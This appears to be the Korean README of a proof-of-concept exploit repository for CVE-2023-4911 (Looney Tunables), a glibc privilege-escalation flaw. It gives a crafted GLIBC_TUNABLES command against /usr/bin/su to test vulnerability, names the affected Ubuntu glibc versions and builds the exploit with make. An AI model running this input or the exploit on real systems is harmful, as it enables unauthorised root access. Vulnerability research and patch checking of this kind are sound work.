
CVE-2023-4911
이것은 Looney Tunables Linux 권한 상승 취약점에 대한 PoC(개념 증명)입니다. 이 PoC를 기반으로 합니다. leesh3288에게 큰 감사를 드립니다. 여기에서 매우 상세한 분석 문서를 찾을 수 있으며, 여기에서 IppSec의 아주 멋진 동영상을 볼 수 있습니다.
취약한지 확인하기
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

참고로 취약한 glibc 버전은 이 버전을 포함하여 2.35-0ubuntu3.3 이하입니다.

익스플로잇 실행
$ make
